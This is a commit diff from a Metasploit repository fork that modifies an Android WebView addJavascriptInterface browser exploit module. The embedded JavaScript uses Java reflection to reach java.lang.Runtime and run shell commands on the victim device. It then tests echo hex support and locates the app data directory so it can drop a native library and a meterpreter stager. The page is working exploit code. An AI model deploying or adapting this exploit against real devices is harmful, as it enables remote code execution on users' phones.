adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add a test on echo to check for hex support.

Browse Source 
* This is much nicer than checking version on userAgent, which
is often changed when rendered in an embedded webview.
This commit is contained in:
Joe Vennix
2014-04-08 17:58:31 -05:00
parent 2e4c2b1637
commit fc841331d2
1 changed files with 33 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/android/browser/webview_addjavascriptinterface.rb
+33 -20
View File
@@ -28,20 +28,12 @@ class Metasploit3 < Msf::Exploit::Remote
:os_flavor => 'Android',
:javascript => true,
:rank => ExcellentRanking,
# The Android 4.0 shell is different than other versions of android
# in that the echo builtin does not allow the \x hex encoding syntax.
# Android 4.0 is still vulnerable to the Java reflection exploit, but
# until we find a way to drop and run the payload, we can't support
# it as a target.
:vuln_test => %Q|
if (!navigator.userAgent.match(/Android 4\.0;/)) {
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
)
@@ -97,6 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
def on_request_uri(cli, req)
if req.uri =~ /\.js/
serve_static_js(cli, req)
elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
print_warning "Received message: #{req.body}"
else
super
end
@@ -119,7 +113,17 @@ class Metasploit3 < Msf::Exploit::Remote
def js(arch)
stagename = Rex::Text.rand_text_alpha(5)
script = %Q|
function exec(obj) {
function exec(runtime, cmdArr) {
var ch = 0;
var output = '';
var process = runtime.exec(cmdArr);
var input = process.getInputStream();
while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
return output;
}
function attemptExploit(obj) {
// ensure that the object contains a native interface
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
@@ -135,6 +139,19 @@ class Metasploit3 < Msf::Exploit::Remote
.getMethod('getRuntime', null)
.invoke(null, null);
// now ensure we can write out a hex-encoded byte with the shell's echo builtin
var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
if (byte.indexOf("\\\\") > -1) {
// if youre havin byte problems
var xml = new XMLHttpRequest();
// i feel bad for you son
xml.open('POST', '#{get_module_resource}.msg', false);
// i got \\x63 problems
xml.send("Unsupported shell echo builtin: exploit aborted.");
// but your shell aint one
return true;
}
// libraryData contains the bytes for a native shared object built via NDK
// which will load the "stage", which in this case is our android meterpreter stager.
// LibraryData is loaded via ajax later, because we have to access javascript in
@@ -147,9 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
var ch, path = '/data/data/';
while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); }
var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
var stagePath = path + '/#{stagename}.apk';
@@ -172,9 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
return true;
}
if (!navigator.userAgent.match(/Android 4\.0;/)) {
for (i in top) { if (exec(top[i]) === true) break; }
}
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
# remove comments and empty lines